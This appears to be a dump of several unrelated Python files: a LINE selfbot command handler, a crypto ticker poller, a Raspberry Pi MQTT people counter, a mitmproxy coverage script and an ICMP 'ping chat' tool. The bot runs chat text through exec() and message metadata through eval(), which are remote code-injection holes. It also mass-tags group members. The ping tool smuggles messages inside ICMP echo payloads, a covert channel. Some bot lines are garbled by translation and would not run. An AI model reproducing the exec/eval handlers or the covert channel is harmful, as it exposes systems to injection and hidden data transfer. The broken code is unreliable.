"text": "4.0",
"size": "sm",
"color": "#999999",
"margin": "md",
"flex": 0
}
]
},
{
"type": "box",
"layout": "vertical",
"margin": "lg",
"spacing": "sm",
"contents": [
{
"type": "box",
"layout": "baseline",
"spacing": "sm",
"contents": [
{
"type": "text",
"text": "Place",
"color": "#aaaaaa",
"size": "sm",
"flex": 1
},
{
"type": "text",
"text": "Miraina Tower, 4-1-6 Shinjuku, Tokyo",
"wrap": True,
"color": "#666666",
"size": "sm",
"flex": 5
}
]
},
{
"type": "box",
"layout": "baseline",
"spacing": "sm",
"contents": [
{
"type": "text",
"text": "Time",
"color": "#aaaaaa",
"size": "sm",
"flex": 1
},
{
"type": "text",
"text": "10:00 - 23:00",
"wrap": True,
"color": "#666666",
"size": "sm",
"flex": 5
}
]
}
]
}
]
},
"footer": {
"type": "box",
"layout": "vertical",
"spacing": "sm",
"contents": [
{
"type": "button",
"style": "link",
"height": "sm",
"action": {
"type": "uri",
"label": "CALL",
"uri": "https://linecorp.com"
}
},
{
"type": "button",
"style": "link",
"height": "sm",
"action": {
"type": "uri",
"label": "WEBSITE",
"uri": "https://linecorp.com"
}
},
None,
{
"type": "spacer",
"size": "sm"
},
],
"flex": 0
}
}
}
sendTemplate(to, dat)
elif cmd == 'test5':
dat = {
"type": "flex",
"altText": "BAO?",
"contents": {"type": "carousel", "contents": [{"type": "bubble", "header": {"type": "box", "layout": "vertical", "contents": [{"type": "text", "text": "Author - News", "wrap": True, "color": "#9023FF"}]}, "hero": {"type": "image", "url": "https://i.imgur.com/zgu5fcI.jpg", "size": "full", "aspectMode": "cover", "aspectRatio": "5:3"}, "body": {"type": "box", "layout": "vertical", "spacing": "sm", "contents": [{"type": "text", "text": "administrator: mal", "wrap": True, "margin": "sm", "maxLines": 0, "size": "md", "color": "#ffffff"}]}, "footer": {"type": "box", "layout": "vertical", "contents": [{"type": "button", "style": "primary", "color": "#00bfff", "action": {"type": "uri", "label": "Accessor friend", "uri": "line://ti/p/aDtv2LTeKS"}}, {"type": "separator", "margin": "md", "color": "#fe8cb7"}, {"type": "button", "style": "primary", "color": "#00bfff", "action": {"type": "uri", "label": "Front-end website", "uri": "https://bot.harusakura.cc"}}, {"type": "separator", "margin": "md", "color": "#fe8cb7"}, {"type": "button", "style": "primary", "color": "#00bfff", "action": {"type": "uri", "label": "Anonymous message", "uri": "https://harusakura.cc/whisper"}}]}, "styles": {"header": {"backgroundColor": "#fe8cb7"}, "hero": {"backgroundColor": "#fe8cb7"}, "body": {"backgroundColor": "#fe8cb7"}, "footer": {"backgroundColor": "#fe8cb7"}}}]}
}
sendTemplate(to, dat)
elif cmd == 'test6':
dat = {
"type": "flex",
"altText": "BAO?",
"contents": {}
}
sendTemplate(to, dat)
elif cmd == 'test7':
dat = {
"type": "flex",
"altText": "BAO?",
"contents": {}
}
sendTemplate(to, dat)
elif cmd.startswith('ud'):
if 'MENTION' in msg.contentMetadata.keys() != None:
targets = []
MENTION = eval(msg.contentMetadata['MENTION'])
for x in MENTION["MENTIONEES"]:
if x["M"] not in targets:
targets.append(x["M"])
for target in targets:
cl.relatedMessage(
to, str(cl.getContact(target)), msg_id)
elif cmd.startswith("cmd:"):
txt = text[4:]
try:
exec(str(txt))
print('\n===caveat===\nSpecial instructions\ninstruction:cmd\nTrigger text: {}\nuser: {}\nposition: {}\n===the end===\n'.format(
text, sender, to))
except Exception as e:
cl.relatedMessage(to, "Execute command error\n"+str(e), msg_id)
elif cmd == 'cra':
a = cl.getChatRoomAnnouncements(to)
if a == []:
cl.relatedMessage(to, "Can't find", msg_id)
else:
for b in a:
c = b.contents
d = c.link
e = c.text
cl.replyMention(
msg_id, to, '[Announcement]\ncontent: {}\nBulletin:@!\nlink: {}'.format(e, d), [b.creatorMid])
elif cmd.startswith("cra:"):
a = text[4:]
b = ChatRoomAnnouncementContents()
b.displayFields = 5
b.text = a
b.link = "line://nv/chatMsg?chatId={}&messageId={}".format(
to, msg_id)
cl.createChatRoomAnnouncement(to, 0, b)
cl.relatedMessage(to, "success\ncontent: {}".format(a), msg_id)
elif cmd == "ccra":
a = cl.getChatRoomAnnouncements(to)
if a == []:
cl.relatedMessage(to, "Can't find", msg_id)
else:
for b in a:
cl.removeChatRoomAnnouncement(
to, b.announcementSeq)
cl.relatedMessage(to, "carry out", msg_id)
elif cmd == "Pumper":
paths = []
for picpaths in os.walk('./images'):
paths.append(picpaths)
sample = random.choice(paths)
#cl.sendReplyMessage(msg.id, to, "Selected file:"+sample)
#print("\n\nSelected file: "+ Sample +" \ n \ n ")
Cl.sendImage (to, SAMPle[0]+"/"+random.choice(sample[2]))
elif cmd == "Sis":
meizi = sum(len(files) for _, _, files in os.walk('./images'))
cl.relatedMessage(to, str(meizi), msg_id)
elif cmd == "Sister":
fileDir = r"./images"
fileExt = r".jpg"
w = [_ for _ in os.listdir(fileDir) if _.endswith(fileExt)]
q = 0
cl.relatedMessage(to, "removing...", msg_id)
for x in w:
q += 1
os.remove("./images/"+x)
cl.relatedMessage(to, f"ok\ndelete {q} pic", msg_id)
elif cmd in set['ccmd']['liffurl']:
cl.relatedMessage(
to, "https://liff.line.me/1655527991-3Lbo8OkW", msg_id)
elif cmd in set['ccmd']['time']:
cl.relatedMessage(to, datetime.now(tz=pytz.timezone(
"Asia/Jakarta")).strftime('%H:%M:%S'), msg_id)
elif cmd in set['ccmd']['date']:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
day = ["Sunday", "Monday", "Tuesday",
"Wednesday", "Thursday", "Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
hr = timeNow.strftime("%A")
bln = timeNow.strftime("%m")
for i in range(len(day)):
if hr == day[i]:
hasil = hari[i]
readTime = timeNow.strftime(
'%Y') + "/" + bln + "/" + timeNow.strftime('%d') + " " + hasil
cl.relatedMessage(to, readTime, msg_id)
elif cmd in set['ccmd']['lasttag']:
if set["lastt"] == {}:
cl.relatedMessage(to, "Can't find a label message", msg_id)
else:
cl.relatedMessage(to, "Caller: {} ({})\nTime: {}\nPosition: {}".format(cl.getContact(
set["lastt"]["mid"]).displayName, set["lastt"]["mid"], set["lastt"]["time"], set["lastt"]["to"]), set["lastt"]["msgid"])
elif cmd in set['ccmd']['logout']:
cl.relatedMessage(to, "Will automatically log out the machine", msg_id)
cl.relatedMessage(to, "[prompt]\nAlready automatically logged out of the background server", msg_id)
os._exit(0)
elif cmd in set['ccmd']['oplist']:
if set["owner"] == []:
cl.relatedMessage(to, "No permission", msg_id)
else:
mc = "[Permissions list]"
arr = []
mention = "@mal "
for mi_d in set["owner"]:
mc += "\n➲"
slen = str(len(mc))
elen = str(len(mc) + len(mention) - 1)
arrData = {'S': slen, 'E': elen, 'M': mi_d}
arr.append(arrData)
mc += mention
cl.sendReplyMessage(msg_id, to, mc+"\n[the end]", contentMetadata={
'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, contentType=0)
elif cmd in set['ccmd']['restart']:
python = sys.executable
os.execl(python, python, *sys.argv)
elif cmd in set['ccmd']['status']:
try:
cl.kickoutFromGroup(msg.to, ["test"])
except Exception as e:
if e.reason == "request blocked":
aa = "Regulation"
else:
aa = "Can be implemented"
try:
cl.inviteIntoGroup(msg.to, ["test"])
bb = "Can be implemented"
except:
bb = "Regulation"
try:
cl.findAndAddContactsByMid("test")
except Exception as e:
if e.reason == "request blocked":
cc = "Regulation"
else:
cc = "Can be implemented"
try:
cl.acceptGroupInvitationByTicket("test", "test")
except Exception as e:
if e.reason == "request blocked":
dd = "Regulation"
else:
dd = "Can be implemented"
cl.relatedMessage(to, "ΞΞΞΞΞ〘Machine status query〙ΞΞΞΞΞ\n※Kick:" + str(aa) + "\n※Invitation status:" + str(
bb) + "\n※Cancel state:Can be implemented\n※Advance:" + str(cc) + "\n※URL status:" + str(dd), msg_id)
elif cmd in set['ccmd']['findoa']:
oas = "[Nonmittent]"
if msg.toType == 1:
room = cl.getRoom(to)
for contact in room.contacts:
if contact.capableBuddy:
oas += "\n{}\n{}".format(cl.getContact(
contact.mid).displayName, contact.mid)
if oas == "[Nonmittent]":
cl.relatedMessage(to, "Can't find", msg_id)
else:
cl.relatedMessage(to, oas, msg_id)
elif msg.toType == 2:
group = cl.getGroup(to)
for contact in group.members:
if contact.capableBuddy:
oas += "{}\n{}".format(cl.getContact(
contact.mid).displayName, contact.mid)
if oas == "[Nonmittent]":
cl.relatedMessage(to, "Can't find", msg_id)
else:
cl.relatedMessage(to, oas, msg_id)
elif cmd in set['ccmd']['ttag']:
if msg.toType == 1:
room = cl.getRoom(to)
nama = [contact.mid for contact in room.contacts]
k = len(nama)//21
for a in range(k+1):
txt = u''
s = 0
b = []
for i in room.contacts[a*20: (a+1)*20]:
b.append(
{"S": str(s), "E": str(s+6), "M": i.mid})
s += 7
txt += u'@mal \n'
cl.sendReplyMessage(msg_id, to, text=txt, contentMetadata={
u'MENTION': json.dumps({'MENTIONEES': b})}, contentType=0)
elif msg.toType == 2:
group = cl.getGroup(to)
nama = [contact.mid for contact in group.members]
k = len(nama)//21
for a in range(k+1):
txt = u''
s = 0
b = []
for i in group.members[a*20: (a+1)*20]:
b.append(
{"S": str(s), "E": str(s+6), "M": i.mid})
s += 7
txt += u'@mal \n'
cl.sendReplyMessage(msg_id, to, text=txt, contentMetadata={
u'MENTION': json.dumps({'MENTIONEES': b})}, contentType=0)
elif cmd in set['ccmd']['stag']:
if msg.toType == 1:
room = cl.getRoom(to)
nama = [contact.mid for contact in room.contacts]
k = len(nama)//21
for a in range(k+1):
txt = u''
s = 0
b = []
for i in room.contacts[a*20: (a+1)*20]:
b.append(
{"S": str(s), "E": str(s+6), "M": i.mid})
s += 7
txt += u'@mal \n'
cl.sendReplyMessage(msg_id, to, txt, {'STKVER': '1', 'STKID': '12228774', 'STKPKGID': '1302449', u'MENTION': json.dumps({'MENTIONEES': b})}, 7)
elif msg.toType == 2:
group = cl.getGroup(to)
nama = [contact.mid for contact in group.members]
k = len(nama)//21
for a in range(k+1):
txt = u''
s = 0
b = []
for i in group.members[a*20: (a+1)*20]:
b.append(
{"S": str(s), "E": str(s+6), "M": i.mid})
s += 7
txt += u'@mal \n'
cl.sendReplyMessage(msg_id, to, txt, {'STKVER': '1', 'STKID': '12228774', 'STKPKGID': '1302449', u'MENTION': json.dumps({'MENTIONEES': b})}, 7)
elif cmd in set['ccmd']['ltag']:
if msg.toType == 1:
room = cl.getRoom(to)
nama = [contact.mid for contact in room.contacts]
k = len(nama)//21
for a in range(k+1):
txt = u''
s = 0
b = []
for i in room.contacts[a*20: (a+1)*20]:
b.append(
{"S": str(s), "E": str(s+6), "M": i.mid})
s += 7
txt += u'@mal \n'
cl.sendTagLocation(
to, txt, {u'MENTION': json.dumps({'MENTIONEES': b})})
elif msg.toType == 2:
group = cl.getGroup(to)
nama = [contact.mid for contact in group.members]
k = len(nama)//21
for a in range(k+1):
txt = u''
s = 0
b = []
for i in group.members[a*20: (a+1)*20]:
b.append(
{"S": str(s), "E": str(s+6), "M": i.mid})
s += 7
txt += u'@mal \n'
cl.sendTagLocation(
to, txt, {u'MENTION': json.dumps({'MENTIONEES': b})})
elif cmd.startswith('un:'):
try:
mes = int(cmd[3:])
except:
mes = 1
M = cl.getRecentMessagesV2(to, 1001)
MId = []
for ind, i in enumerate(M):
if ind == 0:
pass
else:
if i._from == clMID:
MId.append(i.id)
if len(MId) == mes:
break
for i in MId:
try:
cl.unsendMessage(i)
except:
pass
elif cmd.startswith("set:"):
a = cmd[4:]
if a == 'all':
b = "[All settings]"
for c in set2:
b += "\n{}: {}".format(c, str(set2[c]))
cl.relatedMessage(to, b, msg_id)
elif a == 'all on':
for b in set2:
set2[b] = True
cl.relatedMessage(to, "success\nAll:True", msg_id)
elif a == 'all off':
for b in set2:
set2[b] = False
cl.relatedMessage(to, "success\nAll:False", msg_id)
elif a in set2:
if set2[a] == True:
set2[a] = False
cl.relatedMessage(
to, "success\n{}:False".format(a), msg_id)
else:
set2[a] = True
cl.relatedMessage(
to, "success\n{}:True".format(a), msg_id)
elif cmd.startswith("debugadd:"):
x = cmd[9:]
if x in test["debug"]:
cl.relatedMessage(
to, f"{x} already in", msg_id)
else:
test["debug"].append(x)
cl.relatedMessage(
to, f"okay\nadd {x}", msg_id)
elif cmd.startswith("ccmd:"):
a = cmd.split(":")
if len(a) == 3 and a[1] != "" and a[2] != "":
if a[1] in set['ccmd']:
for b in set['ccmd']:
if a[2] in set['ccmd'][b]:
cl.relatedMessage(
to, "Overlap\nkey: {}\ncmd: {}".format(b, a[2]), msg_id)
return
elif a[2] in ['help', 'allcmd', 'cmds', '幫助', '指令表', '指令', 'cmd', 'un', 'set', 'ccmd', 'dcmd', 'op', 'cra', 'ccra', 'test1', 'test2', 'debugadd', 'test3', 'test4', 'test5', 'test6']:
cl.relatedMessage(
to, "Instructions are not legal\ncmd: {}".format(a[2]), msg_id)
return
set['ccmd'][a[1]].append(a[2])
cl.relatedMessage(
to, "New customization\nkey: {}\ncmd: {}".format(a[1], a[2]), msg_id)
elif cmd.startswith("dcmd:"):
a = cmd[5:]
if a != "":
for b in set['ccmd']:
if a in set['ccmd'][b]:
set['ccmd'][b].remove(a)
cl.relatedMessage(
to, "Delete Custom Customs Directive\nkey: {}\ncmd: {}".format(b, a), msg_id)
break
elif cmd.startswith("op:"):
mids_re = re.compile("u[a-z0-9]{32}")
mids = mids_re.findall(cmd)
targets = []
for l in mids:
if l not in targets:
if ismid(l):
targets.append(l)
if 'MENTION' in msg.contentMetadata.keys() != None:
MENTION = eval(msg.contentMetadata['MENTION'])
for x in MENTION["MENTIONEES"]:
if x["M"] not in targets:
targets.append(x["M"])
for target in targets:
if target in set["owner"]:
set["owner"].remove(target)
else:
set["owner"].append(target)
cl.relatedMessage(to, "Permission adjustment", msg_id)
elif op.type in [60]:
pass
elif op.param1 in test["debug"] or set2["debugall"]:
if op.type in OpType._VALUES_TO_NAMES:
print(
f"[ {str(op.type)} ]{OpType._VALUES_TO_NAMES[op.type].replace('_', ' ')}")
else:
print(f"[ {str(op.type)} ]UNKNOWN")
print(op)
except Exception as e:
# print(e)
error_class = e.__class__.__name__ # Number of error
detail = e.args[0] # Details
cal, exc, tb = sys.exc_info() # Obtain Call Stack
lastCallStack = traceback.extract_tb(tb)[-1] # Obtain Call Stack Last information
fileName = lastCallStack[0] # A file name acquired
lineNum = lastCallStack[1] # Take the line number
funcName = lastCallStack[2] # Get the name of the function
errMsg = "File \"{}\", line {}, in {}: [{}] {}".format(
fileName, lineNum, funcName, error_class, detail)
print(errMsg)
# Main long-poll loop: fetch up to 50 pending operations per trace and
# dispatch each to lineBot() on its own thread so a slow handler cannot
# stall the poller.
while True:
    try:
        ops = oepoll.singleTrace(count=50)
        if ops is not None:
            for op in ops:
                # Advance the revision first so this op is not re-delivered.
                oepoll.setRevision(op.revision)
                thread = threading.Thread(target=lineBot, args=(op,))
                thread.start()
    except Exception as e:
        print(e)
|
market_data.py | from algoplex.api.common.market_data import MarketData
import threading
import time
import requests
import json
class MarketData(MarketData):
    """Coincheck ticker poller.

    Polls the public Coincheck ticker endpoint on a background thread and
    notifies registered subscribers whenever the last-trade price changes.
    """

    api_url = 'https://coincheck.com/api/ticker'

    def __init__(self, poll_period_sec):
        self.poll_period_sec = poll_period_sec
        self.subscribers = []
        self.subscribed = False
        self.last_trade_price = None
        # Polling thread; the original assigned this twice for no reason.
        self.watcher = None
        self.active = False

    def subscribe(self, subscriber):
        """Register a subscriber and lazily start the polling thread."""
        self.subscribers.append(subscriber)
        if not self.subscribed:
            self.start_subscription()

    def unsubscribe(self, subscriber):
        """Remove a subscriber; stop polling once nobody is listening."""
        self.subscribers.remove(subscriber)
        if not self.subscribers:
            self.active = False

    def start_subscription(self):
        """Start the background watcher thread (at most once)."""
        # BUG FIX: the original never set `subscribed`, so every call to
        # subscribe() spawned another watcher thread.
        self.subscribed = True
        self.active = True
        self.watcher = threading.Thread(target=self.watch_market_data)
        self.watcher.start()

    def watch_market_data(self):
        """Poll loop: fetch the last price and fan out changes to subscribers."""
        while self.active:
            try:
                new_trade_price = self.get_last_price()
                # Only notify on an actual change; None means the fetch failed.
                if (new_trade_price != self.last_trade_price
                        and new_trade_price is not None):
                    self.last_trade_price = new_trade_price
                    for subscriber in self.subscribers:
                        subscriber.update(new_trade_price)
            except requests.exceptions.ConnectionError:
                print('Connection refused')
            time.sleep(self.poll_period_sec)

    def get_last_price(self):
        """Return the latest trade price as a float, or None on any failure."""
        try:
            response = requests.get(self.api_url)
            if response.ok:
                return float(json.loads(response.text)['last'])
        except requests.exceptions.ConnectionError:
            print('MarketData: connection refused')
        return None
|
count people with magnetic sensor - local MQTT publish.py | # Import standard python modules
import time
import sys
import threading
import datetime
# Import Raspberry Hardware
import board
import busio
# Import ADS1115 module
import adafruit_ads1x15.ads1115 as ADS
from adafruit_ads1x15.analog_in import AnalogIn
# Import RPi.GPIO Module
import RPi.GPIO as GPIO
# Import paho MQTT Client
import paho.mqtt.client as mqtt
# Define global vars #
# Control of sincronization in Threads
# Re-entrant lock guarding DataCount.countTimes, which is shared between
# the main counting loop and the show_data() publisher thread.
lock = threading.RLock()
# Setup show data time
# Publish interval (seconds) used by show_data().
showDataTime=20
# Define Classes #
# Define class for instance objects in threading
class DataCount():
    """Shared counter state handed to the publisher thread."""

    def __init__(self, mqttClient):
        # Detections accumulated since the last publish; guarded by `lock`.
        self.countTimes = 0
        # MQTT client used by show_data() to publish the counter.
        self.client = mqttClient
# Define functions #
# Define functions for paralelism
def show_data(peopleCount):
    """Publish peopleCount.countTimes every showDataTime seconds, then reset it.

    Runs forever; meant to be the target of a daemon-ish thread. The
    `already_published` flag ensures only one publish per time boundary.
    """
    already_published = False
    while True:
        on_boundary = int(time.time()) % showDataTime == 0
        if on_boundary and not already_published:
            with lock:
                peopleCount.client.publish("piso0/entrada0/personasMag",
                                           peopleCount.countTimes)
                peopleCount.countTimes = 0
            already_published = True
        elif not on_boundary:
            already_published = False
# Define callback functions which will be called when certain events happen.#
def on_connect(client, userdata, flags, rc):
    """paho-mqtt connect callback: mark the client as connected."""
    print("Conectado con codigo resultante: " + str(rc))
    # main() spins on this flag while waiting for the broker handshake.
    client.connectedFlag = True
def on_disconnect(client):
    """paho-mqtt disconnect callback: terminate the whole process.

    This script cannot operate without the broker connection, so a hard
    exit is used rather than attempting to reconnect.
    """
    # BUG FIX: `os` was never imported at module level, so os._exit raised
    # NameError instead of exiting. Import it locally here.
    import os
    print("¡Se ha Desconectado!")
    os._exit(1)
def main():
    """Count people with a magnetic sensor read via an ADS1115 ADC and
    publish totals over MQTT.

    Usage: script.py <broker-host>
    """
    if(len(sys.argv)!=2):
        sys.stderr.write('Usage: "{0}" $hostAddress\n'.format(sys.argv[0]))
        # BUG(review): `os` is never imported in this module, so this line
        # raises NameError instead of exiting; should be sys.exit(1).
        os._exit(1)
    # Create the I2C bus
    i2c = busio.I2C(board.SCL, board.SDA)
    # Create the ADC object using the I2C bus
    ads = ADS.ADS1115(i2c)
    # Create single-ended input on channel 0
    chan = AnalogIn(ads, ADS.P0)
    # Dict with some GPIO pin numbers
    pinList={"countState":7, "count":8}
    # Setup GPIO setmode
    GPIO.setmode(GPIO.BCM)
    # Set GPIO pin signal OUT and initial value "shutdown"
    GPIO.setup(list(pinList.values()), GPIO.OUT, initial=GPIO.LOW)
    # Setup MQTT instance
    client = mqtt.Client()
    # Setup the callback functions
    client.on_connect = on_connect
    client.on_disconnect = on_disconnect
    # Setup Control vars
    client.connectedFlag=False
    # Connect to the Broker server.
    print("conectando al broker")
    client.connect(sys.argv[1], 1883, 60)
    client.loop_start()
    # Block until on_connect() flips the flag.
    while not client.connectedFlag:
        print("Esperando conexión")
        time.sleep(1)
    # Control of count system
    peopleCount=DataCount(client)
    # When magnetic element is far the min value is reached
    sensorValueMin=6900
    # When magnetic element is near the max value is reached
    sensorValueMax=10300
    """When magnectic element are middle of distances between min and
    max
    """
    sensorValueMedium=(int((sensorValueMax-sensorValueMin)/2)
                       + sensorValueMin)
    baseTime=time.time()
    countTemp=0 # Count value while state count and doesn't show
    countTempLast=0 # For toggle LED alert count +1
    # Flags for execute only one time (turn off, turn on)
    counted=False
    countState=False
    countTempLastState=True
    countRate=0.6  # seconds per counted unit while the plaque is held low
    # Setup Threading, to show data every 20 seconds
    hilo0=threading.Thread(target=show_data, args=[peopleCount,])
    hilo0.start()
    while True:
        sensorValue = chan.value # Distance of magnetic sensor
        # Case if are plaque in high position
        if(sensorValue>=sensorValueMedium):
            baseTime=time.time()
            # Flush any pending count into the shared counter.
            if(countTemp!=0):
                lock.acquire()
                peopleCount.countTimes+=countTemp
                lock.release()
                countTemp=0
            # Turn off LED to alert plaque in high position
            if(countState):
                countState=False
                GPIO.output(pinList.get("countState"), GPIO.LOW)
        else: # Case if are plaque in low position
            """Triggered every showDataTime-1 seconds for update
            counTimes
            """
            # print("is",sensorValue, sensorValueMedium)
            if(int(time.time())%(showDataTime-1)==0):
                # Do only one time per showDataTime-1
                if(not counted):
                    lock.acquire()
                    peopleCount.countTimes+=countTemp
                    lock.release()
                    # Update base time with rate residue
                    baseTime=time.time()-(time.time()%countRate)
                    # Update countTempLast for LED count alert
                    continueTime=time.time()-baseTime
                    countTempLast=int(continueTime/countRate)+1
                    counted=True
            else:
                counted=False
            continueTime=time.time()-baseTime
            # Count rate + 1 more (case 0 to 0.6)
            countTemp=int(continueTime/countRate)+1
            # Turn on LED to alert plaque in low position
            if(not countState):
                countState=True
                GPIO.output(pinList.get("countState"), GPIO.HIGH)
        # Turn on LED to alert every counted +1 for 1 cycle time
        if(countTempLast!=countTemp):
            countTempLast=countTemp
            countTempLastState=False
            GPIO.output(pinList.get("count"), GPIO.HIGH)
        elif(not countTempLastState):
            countTempLastState=True
            GPIO.output(pinList.get("count"), GPIO.LOW)
        time.sleep(0.1) # Cycle time
if __name__=="__main__":
    try:
        main()
    # NOTE(review): bare except catches everything (including SystemExit and
    # KeyboardInterrupt) so the GPIO pins are always released on the way out.
    except:
        print("{} line {}".format(sys.exc_info()[0],
                                  sys.exc_info()[-1].tb_lineno))
        GPIO.cleanup()
individual_coverage.py | import io
import contextlib
import os
import sys
import glob
import multiprocessing
import configparser
import itertools
import pytest
def run_tests(src, test, fail):
    """Run pytest for one source/test pair enforcing 100% coverage.

    src:  source file whose coverage is measured.
    test: the matching test file to execute.
    fail: True when src is on the exclusion list, i.e. it is EXPECTED
          to miss the coverage bar.

    Exits the process with pytest's exit code. Semantics are inverted
    for excluded files: an unexpected success exits 42, an expected
    failure exits 0.
    """
    stderr = io.StringIO()
    stdout = io.StringIO()
    # Capture pytest's own output so we can show a condensed report below.
    with contextlib.redirect_stderr(stderr):
        with contextlib.redirect_stdout(stdout):
            e = pytest.main([
                '-qq',
                '--disable-pytest-warnings',
                '--no-faulthandler',
                '--cov', src.replace('.py', '').replace('/', '.'),
                '--cov-fail-under', '100',
                '--cov-report', 'term-missing:skip-covered',
                test
            ])
    if e == 0:
        if fail:
            print("UNEXPECTED SUCCESS:", src, "Please remove this file from setup.cfg tool:individual_coverage/exclude.")
            e = 42
        else:
            print("SUCCESS: ", src)
    else:
        if fail:
            print("IGNORING FAIL: ", src)
            e = 0
        else:
            # Try to condense the failure to the single relevant coverage line.
            cov = [l for l in stdout.getvalue().split("\n") if (src in l) or ("was never imported" in l)]
            if len(cov) == 1:
                print("FAIL: ", cov[0])
            else:
                # BUG FIX: the original printed stdout twice on this line;
                # print it once, then the captured streams below.
                print("FAIL: ", src, test, stdout.getvalue())
                print(stderr.getvalue())
                print(stdout.getvalue())
    sys.exit(e)
def start_pytest(src, test, fail):
    # run pytest in a new process, otherwise imports and modules might conflict
    worker = multiprocessing.Process(target=run_tests, args=(src, test, fail))
    worker.start()
    worker.join()
    return (src, test, worker.exitcode)
def main():
    """Discover source/test pairs and run each through start_pytest.

    Reads the exclusion list from setup.cfg; exits with status 1 if any
    non-excluded file fails its individual coverage run.
    """
    c = configparser.ConfigParser()
    c.read('setup.cfg')
    fs = c['tool:individual_coverage']['exclude'].strip().split('\n')
    no_individual_cov = [f.strip() for f in fs]
    # Directories whose files never get individual coverage runs.
    excluded = ['mitmproxy/contrib/', 'mitmproxy/test/', 'mitmproxy/tools/', 'mitmproxy/platform/']
    src_files = glob.glob('mitmproxy/**/*.py', recursive=True) + glob.glob('pathod/**/*.py', recursive=True)
    src_files = [f for f in src_files if os.path.basename(f) != '__init__.py']
    src_files = [f for f in src_files if not any(os.path.normpath(p) in f for p in excluded)]
    ps = []
    for src in sorted(src_files):
        # Convention: test/<dir>/test_<name>.py mirrors <dir>/<name>.py.
        test = os.path.join("test", os.path.dirname(src), "test_" + os.path.basename(src))
        if os.path.isfile(test):
            ps.append((src, test, src in no_individual_cov))
    result = list(itertools.starmap(start_pytest, ps))
    # (removed a stray dead `pass` that followed this check)
    if any(e != 0 for _, _, e in result):
        sys.exit(1)
# Script entry point: only run the coverage sweep when executed directly.
if __name__ == '__main__':
    main()
|
pingChat.py | #!/usr/bin/python
import time
import socket
import struct
import sys
import array
import threading
# NOTE(review): this script targets Python 2 (print statements and
# raw_input appear below).
# Local address the receiving raw socket binds to.
listeningIP = "149.161.253.97"
seqNumber = 0 # Sequence Number is Incremented every time a ping is sent...
ICMP_ECHOREPLY = 0 # Echo reply (per RFC792)
ICMP_ECHO = 8 # Echo request (per RFC792)
ICMP_MAX_RECV = 2048
#https://gist.github.com/pklaus/856268
#https://github.com/l4m3rx/python-ping/blob/master/ping.py
def default_timer():
    """Return a timestamp using the platform's preferred wall-clock timer."""
    # Windows historically had better resolution via time.clock().
    return time.clock() if sys.platform == "win32" else time.time()
def calcChecksum(source_string):
    """
    A port of the functionality of in_cksum() from ping.c

    Computes the 16-bit one's-complement Internet checksum over
    source_string and returns it in network byte order.

    Ideally this would act on the string as a series of 16-bit ints (host
    packed), but this works.
    Network data is big-endian, hosts are typically little-endian
    """
    if (len(source_string) % 2):
        # Pad to an even number of bytes so it splits into 16-bit words.
        source_string += "\x00"
    converted = array.array("H", source_string)
    if sys.byteorder == "big":
        # BUG FIX: was `converted.bytewap()` (typo) — raised AttributeError
        # on big-endian hosts instead of byte-swapping the words.
        converted.byteswap()
    val = sum(converted)
    val &= 0xffffffff  # Truncate val to 32 bits (a variance from ping.c, which
    # uses signed ints, but overflow is unlikely in ping)
    val = (val >> 16) + (val & 0xffff)  # Add high 16 bits to low 16 bits
    val += (val >> 16)  # Add carry from above (if any)
    answer = ~val & 0xffff  # Invert and truncate to 16 bits
    answer = socket.htons(answer)
    return answer
def listenPing():
    # Receive message fragments over a raw ICMP socket and write the
    # reassembled text to rec.txt. The payload '99zz' is the sender's
    # end-of-transmission marker. Requires root privileges (SOCK_RAW).
    counter = 1
    rec = open("rec.txt","a")
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
    s.bind((listeningIP, 1))
    stay = True
    msg = []
    while stay:
        try:
            data = s.recv(1024)
            # First 20 bytes of the datagram: IPv4 header.
            ipHeader = data[:20]
            iphVersion, iphTypeOfSvc, iphLength, \
                iphID, iphFlags, iphTTL, iphProtocol, \
                iphChecksum, iphSrcIP, iphDestIP = struct.unpack(
                    "!BBHHHBBHII", ipHeader
                )
            # Next 8 bytes: ICMP header.
            icmpHeader = data[20:28]
            icmpType, icmpCode, icmpChecksum, \
                icmpPacketID, icmpSeqNumber = struct.unpack(
                    "!BBHHH", icmpHeader
                )
            srcIP = socket.inet_ntoa(struct.pack("!L", iphSrcIP))
            if str(data[28:32]) == '99zz':
                # End-of-transmission marker received: stop listening.
                stay = False
                break
            else:
                # Skip our own packets and echo replies (ICMP type 0).
                if str(srcIP) != listeningIP and icmpType != 0:
                    # Insert by sequence number so fragments reassemble in order.
                    msg.insert(icmpSeqNumber, str(data[28:]))
                    #rec.write(data[28:] + "\r\n")
                    #print "SrcIP: " + str(srcIP) + " M:" + data[28:]
        except:
            print "\nUnable to listen for icmp packets...\n"
            break
    s.close()
    # Flush the collected fragments to disk once the transmission ends.
    for dat in msg:
        rec.write(dat + "\r\n")
    rec.close()
def sendMessage(destIP, destMessage):
    """Send destMessage to destIP inside one or more ICMP echo requests.

    Messages longer than 64 characters are split into 63-character chunks,
    one packet per chunk. Returns the send timestamp of the last packet,
    or 0 on failure. Requires root privileges (SOCK_RAW).
    """
    global seqNumber, ICMP_ECHO
    from random import randint
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
        s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    except OSError as e:
        print("Failed with socket error: %s" % str(e))
        print("This requires root privileges...")
        raise
    exitLoop = False
    while exitLoop == False:
        # Chunk the message: at most 63 characters per packet.
        if len(destMessage) > 64:
            currentMessage = destMessage[:63]
            destMessage = destMessage[63:]
        else:
            currentMessage = destMessage
            exitLoop = True
        # Lightly obfuscated 16-bit packet ID.
        randomInt = randint(0,30000)
        packetID = (13927 ^ randomInt) & 0xFFFF
        packetChecksum = 0
        # Provisional header with a zero checksum, used to compute the real one.
        icmpHeader = struct.pack("!BBHHH", ICMP_ECHO, 0, packetChecksum, packetID, seqNumber)
        # (removed `bytes = struct.calcsize("d")` — unused and shadowed the builtin)
        icmpData = currentMessage
        #icmpData = struct.pack("d", default_timer()) + icmpData
        packetChecksum = calcChecksum(icmpHeader + icmpData)
        # Reconstruct the header with the correct checksum...
        icmpHeader = struct.pack("!BBHHH", ICMP_ECHO, 0, packetChecksum, packetID, seqNumber)
        icmpPacket = icmpHeader + icmpData
        sentTime = default_timer()
        try:
            s.sendto(icmpPacket, (destIP, 1))
